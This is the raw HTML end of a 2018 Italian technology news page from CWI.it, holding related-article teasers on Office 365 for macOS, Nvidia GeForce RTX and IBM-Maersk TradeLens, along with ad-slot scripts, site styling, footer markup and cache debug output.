                    <a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/mac-os-x" class="td-post-category">macOS</a>                    <div class="td-post-author-name"><a rel="nofollow" href="https://www.cwi.it/author/redazione-computerworld">CWI.it</a> <span>-</span> </div>                    <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-23T11:28:22+00:00" >Ago 23, 2018</time></div>                                    </div>

                <div class="td-excerpt">
                    A partire da settembre 2018 solo i Mac che eseguono macOS Sierra o High Sierra riceveranno i nuovi aggiornamenti delle funzionalità di Office 365

                </div>
            </div>

                </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_10" >
            <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/hardware/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645"  title="Presentate le nuove Nvidia GeForce RTX, il futuro del gaming"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom-180x135.jpg" alt="nvidia_geforce_rtx_jensen_huang_gamescom" title="Presentate le nuove Nvidia GeForce RTX, il futuro del gaming"/></a></div>
            <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/hardware/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645"  title="Presentate le nuove Nvidia GeForce RTX, il futuro del gaming">Presentate le nuove Nvidia GeForce RTX, il futuro del gaming</a></div>                <div class="meta-info">
                    <a rel="nofollow" href="https://www.cwi.it/hardware" class="td-post-category">Hardware</a>                    <div class="td-post-author-name"><a rel="nofollow" href="https://www.cwi.it/author/redazione-computerworld">CWI.it</a> <span>-</span> </div>                    <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-21T17:54:40+00:00" >Ago 21, 2018</time></div>                                    </div>

                <div class="td-excerpt">
                    Le nuove Nvidia GeForce RTX saranno disponibili dal 20 settembre 2018, ma Acer, Alienware e HP hanno annunciato i primi PC da gaming che sfruttano le nuove GPU                </div>
            </div>

                </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_10 td_module_no_thumb" >
            
            <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/cio/ibm-e-maersk-lanciano-tradelens-la-piattaforma-di-spedizione-basata-su-blockchain_42114641"  title="IBM e Maersk lanciano TradeLens, la piattaforma di spedizione basata su blockchain">IBM e Maersk lanciano TradeLens, la piattaforma di spedizione basata su blockchain</a></div>                <div class="meta-info">
                    <a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/blockchain" class="td-post-category">Blockchain</a>                    <div class="td-post-author-name"><a rel="nofollow" href="https://www.cwi.it/author/redazione-cio">CIO</a> <span>-</span> </div>                    <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-20T17:13:13+00:00" >Ago 20, 2018</time></div>                                    </div>

                <div class="td-excerpt">
                    La piattaforma TradeLens, sviluppata da IBM e Maersk, permette di monitorare in tempo reale la spedizione di merci in tutto il mondo e conta più di 94 early adopter

                </div>
            </div>

                </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a rel="nofollow" href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_5b7e84ada6c17" data-td_block_id="td_uid_9_5b7e84ada6c17"><i class="td-icon-font td-icon-menu-left"></i></a><a rel="nofollow" href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_5b7e84ada6c17" data-td_block_id="td_uid_9_5b7e84ada6c17"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' >
<!-- Beginning Async AdSlot 9 for Ad unit CWI/Hardware  ### size: [[1,3]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[9]]) -->
<div id='div-gpt-ad-795412788689030374-9'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-9'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[9]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 9 -->
    </div></aside><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='12'>
<!-- Beginning Async AdSlot 12 for Ad unit CWI/Hardware  ### size: [[300,250]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[12]]) -->
<div id='div-gpt-ad-795412788689030374-12'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-12'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[12]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 12 -->
    </div></aside>                                </div>
                            </div>
                                    </div> <!-- /.td-pb-row -->
        </article> <!-- /.post -->
    </div>
</div> <!-- /.td-container -->
<!-- Footer -->


<div class="td-footer-container td-container">
    <div class="fm-footer-main">

        <div>
            <a href="http://fieramilanomedia.it/" target="_blank" alt="Fiera Milano Media" class="external" rel="nofollow">
                <img src="https://static.cwi.it/wp-content/themes/Newsmag/images/fiera-milano-media-logo.png">
            </a>
        </div>

        <div>
            <p class="fm-footer-main-text"> CWI è un network di Fiera Milano Media.<br>
                <b>Fiera Milano Media SpA</b> Piazzale Carlo Magno 1 20149 Milano<br>
                Sede operativa e amministrativa S.S. del Sempione 28 20017 Rho (Milano)<br>
                Registro Imprese, C.F. e P.I. 08067990153 CCIAA 1201667 Socio unico Fiera Milano SpA.
                <a href="/contatti/">Contatti</a><br><a href="/privacy/">Privacy</a></br>
                Copyright 2018 - Tutti i diritti riservati
            </p>
        </div>

        <div class="fm-footer-main-last">
            <span>Società del gruppo</span>
            <a href="http://www.fieramilano.it/" target="_blank" class="external" rel="nofollow"><img style="margin: 0 auto;" src="https://static.cwi.it/wp-content/themes/Newsmag/images/fiera-milano-logo.png"></a>
        </div>

        <div class="fm-footer-fix"></div>

    </div>
</div>



<!-- Sub Footer -->
    <div class="td-sub-footer-container td-container td-container-border ">
        <div class="td-pb-row">
            <div class="td-pb-span6 td-sub-footer-copy">
                <div class="td-pb-padding-side">
                    &copy; Copyright 2017 © Fiera Milano Media S.p.A e IDG Communications. Tutti i diritti riservati                </div>
            </div>

            <div class="td-pb-span6 td-sub-footer-menu">
                <div class="td-pb-padding-side">
                    <div class="menu-footer-container"><ul id="menu-footer" class=""><li id="menu-item-1099" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-1099"><a href="https://www.cwi.it/informazioni/chi-siamo">Chi siamo</a></li>
<li id="menu-item-79111" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-79111"><a href="https://www.cwi.it/pubblicita-su-computerworld">Advertising</a></li>
<li id="menu-item-1097" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1097"><a href="https://www.cwi.it/privacy">Privacy</a></li>
<li id="menu-item-76194" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-76194"><a href="https://www.cwi.it/informativa-sui-cookie">Cookie policy</a></li>
</ul></div>                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->



		<script type='text/javascript'>
		jQuery(document).ready(function() {
			jQuery('.inbound_page_views input').val(localStorage.getItem("page_views"));
		});
		</script>
		

    <!--

        Theme: Newsmag by tagDiv 2015
        Version: 1.5 (rara)
        Deploy mode: deploy
        Speed booster: v3.2

        uid: 5b7e84adbe14e
    -->

    
            <style type="text/css" media="screen">
                /* AGGIUNTO 20-02-2017 dimensioni immagini fisse*/

.cwi-fissa {
width: auto !important;
height: auto !important;
}

/*AGGIUNTO 15-10 distanza campi in gform*/

.gform_wrapper .top_label .gfield_label {
margin-top: 1.8em;}

/*AGGIUNTO 27-08*/

.hiddenfield {
display: none; }

/*AGGIUNTO 26-06*/

.td-post-template-4 header .td-post-sub-title {
color: #ffffff!important;
 text-shadow: 2px 2px #000000;
}

.td-post-template-4 header h1 {
color: #ffffff!important;
 text-shadow: 2px 2px #000000;
}


textarea {
border: 1px solid #444444;
}

.header-search-wrap .dropdown-menu {
border-color: #185B92;
border-width: 0 3px 3px 3px;
}

/*AGGIUNTO 18-5*/
.landing-page .td-post-featured-image {
  float: left;
  padding-right: 10px;
}

/*AGGIUNTO 1-4 - interlinea etichette home*/

.td_module_9 .td-post-category {
line-height: 10px;
}

.cwi-sponsored {
text-shadow: 1px 1px white;
font-size: 15px;
}


 /* sottotitolo nei post più scuro */
.td-post-sub-title {
color: #49494C;
}

 /* colore voce di menu BiMag nel top menu*/
#menu-item-114 {
background-color: #8F1F1B;
text-align: center;
}


/* AGGIUNTO 27-03 bordino leggero su thumbnails */
.entry-thumb {
  border-style: solid;
  border-width: 1px;
  border-color: lightgrey;
}

 /* colore voce di menu CIO nel main menu*/
.menu-item-2155{
background-color: #d10014;
text-align: center;
}

 /* tolto bottone read more nel modulo 11. forse non è più necessaria*/
.td_module_11 .td-read-more {
display:none;
}

.td-post-category {
background-color: #185b92;
}

 /* aggiunge ombra di 1 px ai titoli sovrapposti alle foto in big-grid*/
.td-big-grid-post .entry-title a {
text-shadow: 2px 2px 2px #000
}

 /* bordi dei mega menu*/
.td-mega-menu ul  {
border-style: solid;
border-width: 3px;
border-color:  #185b92;
border-top: none;
}
                </style><script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/cta/shared//shortcodes/js/spin.min.js'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/themes/Newsmag/js/td_site.min.js?ver=1.5'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-includes/js/comment-reply.min.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-includes/js/wp-embed.min.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/simplified-social-share/oss-social-sharing/assets/js/oss_share.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://sharecdn.social9.com/v2/js/opensocialsharedefaulttheme.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://sharecdn.social9.com/v2/js/opensocialshare.js?ver=4.9.4'></script>

<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    td_ajax_count.td_get_views_counts_ajax("post","[114645]");
                });
            
</script>

                            <script type="text/javascript">
        var shareWidgetVertical = new OpenSocialShare();
        shareWidgetVertical.init({
             isEmailContentReadOnly:false,isMobileFriendly:true,isTotalShare:true,isShortenUrl:true,isOpenSingleWindow:false,                 
            isCounterWidgetTheme: 0, // 0 or 1 - standard themes or counter widget themes
            isHorizontalCounter: 0, // 0 or 1 - counter on top or counter to right - counter themes only
            isHorizontalLayout: 0, // 0 or 1 - vertical layout or horizontal layout
            widgetIconSize: "32", // "16" or "32" - 16px or 32px standard themes only
            widgetStyle: "square", //"image", "square" or "responsive" - standard themes only
           
            providers: {
                
                   top: ["Facebook","Twitter","LinkedIn","GooglePlus","Pinterest","Email","Print"]
                },
            widgets: {
                 //all : _private.getAllButtonName(_private.widgetConfig),
                      top: ["Facebook Like","Twitter Tweet","Google+ Share","Pinterest Pin it","LinkedIn Share"]
                      },
           
            theme: 'OpenSocialShareDefaultTheme',  
        });
        shareWidgetVertical.injectInterface(".5b7e84acd7494");
        shareWidgetVertical.setWidgetTheme(".5b7e84acd7494");
    </script>
                        
                            
			<div id="cookie-notice" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">Questo sito utilizza i cookie. Accedendo a questo sito, accetti il fatto che potremmo memorizzare e accedere ai cookie sul tuo dispositivo. <a href="/informativa-sui-cookie/">Clicca qui</a> per maggiori informazioni</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie button bootstrap">Ok</a>
				</div>
			</div><script type="text/javascript" src="https://cdn.vertismedia.co.uk/t.js"></script>
</body>
</html>
<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using xcache (SSL caching disabled)
Page cache debug info:
Engine:             xcache
Cache key:          
Reject reason:      SSL caching disabled
Creation Time:      1535018157.000s
Header info:
X-Powered-By:        PHP/5.6.36
Set-Cookie:          PHPSESSID=ret0qpmp9a6nd4pqo3vuuv9775; path=/
Expires:             Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:       no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma:              no-cache
Content-Type:        text/html; charset=UTF-8
Link:                <https://www.cwi.it/wp-json/>; rel="https://api.w.org/"
Link:                <https://www.cwi.it/?p=114645>; rel=shortlink
Content Delivery Network via static.cwi.it

 Served from: www.cwi.it @ 2018-08-23 11:55:57 by W3 Total Cache -->